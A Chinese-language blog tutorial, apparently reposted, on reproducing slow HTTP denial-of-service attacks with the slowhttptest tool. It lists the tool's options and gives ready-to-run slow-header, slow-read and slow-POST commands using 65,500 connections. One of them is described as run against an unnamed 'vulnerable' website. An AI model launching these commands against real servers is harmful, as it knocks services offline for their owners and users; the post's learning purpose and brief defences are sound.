http拒绝服务攻击(Avws复现)

这篇具有很好参考价值的文章主要介绍了http拒绝服务攻击(Avws复现)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.声明:本文仅限学习研究讨论,切忌做非法乱纪之事!

什么是HTTP慢速攻击?

HTTP慢速攻击是利用HTTP合法机制,以极低的速度往服务器发送HTTP请求,尽量长时间保持连接,不释放,若是达到了Web Server对于并发连接数的上限,同时恶意占用的连接没有被释放,那么服务器端将无法接受新的请求,导致拒绝服务。

简单来说,就是我们每次只发一行,每次发送之间的间隔时间很长,这迟迟未发送结束的HTTP包会占用服务端的资源,当达到服务端处理请求的上限时,这时候再用户对网站正常请求,服务端也处理不了了,导致了拒绝服务。

HTTP 慢速攻击也叫 slow http attack,是一种 DoS 攻击的方式。

目的

消耗服务器的连接和内存资源。

如果客户端持续建立这样的连接,那么服务器上可用的连接将一点一点被占满,从而导致DoS(拒绝服务)。

首先HTTP协议的报文都是一行一行的,类似于:

 
  1. GET / HTTP/1.1\r\n

  2. Host : payloads.online\r\n

  3. Connection: keep-alive\r\n

  4. Keep-Alive: 900\r\n

  5. Content-Length: 100000000\r\n

  6. Content_Type: application/x-www-form-urlencoded\r\n

  7. Accept: *.*\r\n

  8. \r\n

那么报文中的\r\n是什么?

\r\n代表一行报文的结束也被称为空行(CRLF),而\r\n\r\n代表整个报文的结束

HTTP慢速攻击分为三类:

  • Slow headers

  • Slow body

  • Slow read

  • 一般使用slowhttptest工具

  • 工具简介

    SlowHTTPTest是一个可配置的应用层拒绝服务攻击测试工具,它可以工作在Linux,OSX和Cygwin环境以及Windows命令行接口,可以帮助安全测试人员检验服务器对慢速攻击的处理能力。

    这个工具可以模拟低带宽耗费下的DoS攻击,比如慢速攻击,慢速HTTP POST,通过并发连接池进行的慢速读攻击(基于TCP持久时间)等。慢速攻击基于HTTP协议,通过精心的设计和构造,这种特殊的请求包会造成服务器延时,而当服务器负载能力消耗过大即会导致拒绝服务。

    使用参数介绍

     
       

    测试模式:
    -H                           slow header,slowloris默认采用此模式          
    -B                           slow body
    -R                           远程攻击又名Apache killer
    -X                           slow read

    报告选项:
    -g                           生成具有套接字状态更改的统计信息(默认关闭)
    -o file_prefix               将统计信息输出保存在file.html和file.csv中(需要-g)
    -v level                     日志信息,详细级别0-4:致命,信息,错误,警告,调试

    常规选项:
    -c connections               连接目标连接数(50)
    -i seconds                   后续数据之间的间隔(以秒为单位)(10)
    -l seconds                   测试目标时间长度,以秒为单位(240)
    -r rate                       每秒连接数(50)
    -s                           如果需要,Content-Length标头的值(4096)
    -t                           在请求中使用的动词,对于slow header和response,默认为GET;对于slow body,默认为POST
    -u URL                       目标的绝对URL(http://localhost/)
    -x                           在slowloris and Slow POST tests模式中,指定发送的最大数据长度
    -f                           Content-Type标头的值(application/x-www-form-urlencoded)
    -m                           接受(Accept)标头的值(text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5)

    探测/代理选项:
    -d host:port                 为所有连接指定代理
    -e host:port                 为探测连接指定代理
    -p seconds                   指定等待时间来确认DoS攻击已经成功

    range attack特定选项:
    -a                           标头中的起始位置
    -b                           标头中的结束位置

    slow read特定选项:
    -k                           在连接中重复相同请求的次数。如果服务器支持永久连接,则用于成倍增加响应大小。
    -n                           从recv缓冲区读取操作之间的时间间隔,以秒为单位(1)
    -w                           slow read模式中指定tcp窗口范围下限
    -y                           slow read模式中指定tcp窗口范围上限
    -z                           在每次的read中,从buffer中读取数据量

    对于三种类型的慢速攻击,分别给出payload:(摘抄的!)

    Slow Header

    1

    slowhttptest -c 65500 -H -i 10 -r 200 -s 8192 -t SLOWHEADER -u http://vulurl.com

    该攻击会像我们刚才讲的慢速传递HTTP报文,占用服务器资源让其等待我们最后的CRLF。

    Slow Read

    1

    slowhttptest -c 65500 -X -r 1000 -w 10 -y 20 -t SLOWREAD -n 5 -z 32 -u http://vulurl.com

    该攻击会在Web服务器响应内容传输回来的时候,我们客户端缓慢的读取响应报文,这样服务器端也会一直等待客户端来接收完毕。

    Slow Post

    1

    slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u http://vulurl.com

    该攻击会构造一个POST数据包,将数据缓慢传输,使服务器端一直等待接收报文。

    找一个存在漏洞的网址进行检测:

    使用kali 自带的slowhttptest,Slow Post的payload:

    1

    slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u https://xxxxxx

缓慢的http拒绝服务攻击复现,http,网络,网络协议

如何防御

  1. 可对每秒钟http并发连接数进行检查。

  2. 对web服务器的http头部传输的最大许可时间进行限制。文章来源地址https://www.toymoban.com/news/detail-545283.html

到了这里,关于http拒绝服务攻击(Avws复现)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 实验二:DOS/DDOS拒绝服务攻击

    (一)实验简介 实验所属系列:网络攻击实验 实验对象: 本科/专科信息安全专业 相关课程及专业:信息网络安全概论、计算机网络 实验时数(学分):2学时 实验类别:实践实验类 (二)预备知识   本实验要求实验者具备如下的相关知识 1. DoS 简介 DoS(Denial of Service),拒

    2024年01月18日
    浏览(64)
  • 拒绝网络攻击--nginx和linux的安全加固

    隐藏nginx版本号 安装启服务 访问不存在的路径 如果访问页面不存在就会暴露nginx版本号,进一步提高了被攻击的可能性 命令行访问: 隐藏版本信息 再次访问不存在的路径,版本号消失 防止DOS、DDOS攻击 DDOS:分布式拒绝服务 配置nginx连接共享内存为10M,每秒钟只接收一个请

    2023年04月26日
    浏览(54)
  • 渗透测试-----9-拒绝服务(黑客其它的攻击方式)

    拒绝服务(黑客其它的攻击方式) Dos(拒绝服务攻击)不是DOOS 利用程序漏洞或一对一资源耗尽的Denialof service 拒绝服务 DDo S(分布式拒绝服务) 一对一的攻击完全拼各自的资源,效果差 多对一的攻击汇聚资源能力,重点在于量大,属于资源耗尽型 DOS分类 D网络 基于巨量的

    2024年02月09日
    浏览(41)
  • 目标URL存在http_host头攻击漏洞复现及修复

    漏洞描述 为了方便的获得网站域名,开发人员一般依赖于HTTP Host header。例如,在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的,如果应用程序没有对host header值进行处理,就有可能造成恶意代码的传入。 危险等级 中危 修复建议 web 应用程序应该使用 SERVER_NAME 而不是

    2024年02月06日
    浏览(45)
  • Golang中基于HTTP协议的网络服务

    HTTP协议是基于TCP/IP协议栈的,并且它也是一个面向普通文本的协议。 只要搞清楚了HTTP请求的报文(报文的头部(header)和主体(body))应该包含的内容,使用任何一个文本编译器,就饿可以编写一个完整的HTTP请求报文。 在这种情况下,直接使用 net.Dial 函数,就可以。 使

    2023年04月09日
    浏览(32)
  • 【计算机网络】HTTP协议以及简单的HTTP服务器实现

    虽然我们说, 应用层协议是我们程序猿自己定的. 但实际上, 已经有大佬们定义了一些现成的, 又非常好用的应用层协议, 供我们直接参考使用. HTTP(超文本传输议)就是其中之一。 平时我们俗称的 “网址” 其实就是说的 URL 像 / ? : 等这样的字符, 已经被url当做特殊意义理解了.

    2024年01月20日
    浏览(63)
  • 慢速 HTTP 拒绝服务: 分析利用和缓解

    慢速 HTTP 拒绝服务: 分析、利用和缓解     慢速 HTTP 攻击Slow HTTP DoS Attack基于这样一个事实,即 HTTP 协议在设计上要求服务器在处理请求之前完全接收请求。如果 HTTP 请求未完成,或者传输速率很低,服务器就会一直占用资源等待其他数据。如果服务器占用过多资源,可能

    2024年04月08日
    浏览(68)
  • CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现

    目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: 下载: 开启IIS: 0x06 漏洞复现: 利用POC: 0x07 流量分析: 客户端: 0x08 修复建议:         仅供学习参考使用,请勿用作违法用途,否则后果自负。         Microsoft Windows HTTP 协议栈(HTTP.

    2024年02月03日
    浏览(58)
  • 网络协议与攻击模拟-15-DNS协议

    1、了解域名结构 2、 DNS 查询过程 3、在 Windows server 上部署 DNS 4、分析流量 实施 DNS 欺骗 再分析 1、概念 ● DNS ( domain name system )域名系统,作为将域名的 IP 地址的相互映射关系存放在一个分布式的数据库, DNS 使用是 UDP 的53端口 ●域名:由 ICANN 机构统一管理 www.baidu.com w

    2024年02月12日
    浏览(59)
  • 网络协议与攻击模拟-05-ICMP协议

    1、理解 ICMP 协议 2、理解 ICMP 重定向 3、会使用 wireshark 分析 ICMP 重定向流量实验 1、 ICMP 协议 Internet 控制报文协议,用于在 IP 主机、路由器之间传递控制消息,控制消息指网络通不通、主机是否可达、路由是否可用等等. ICMP 是属于网络层的协议,封装在传输层与网络层之间

    2024年02月03日
    浏览(60)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包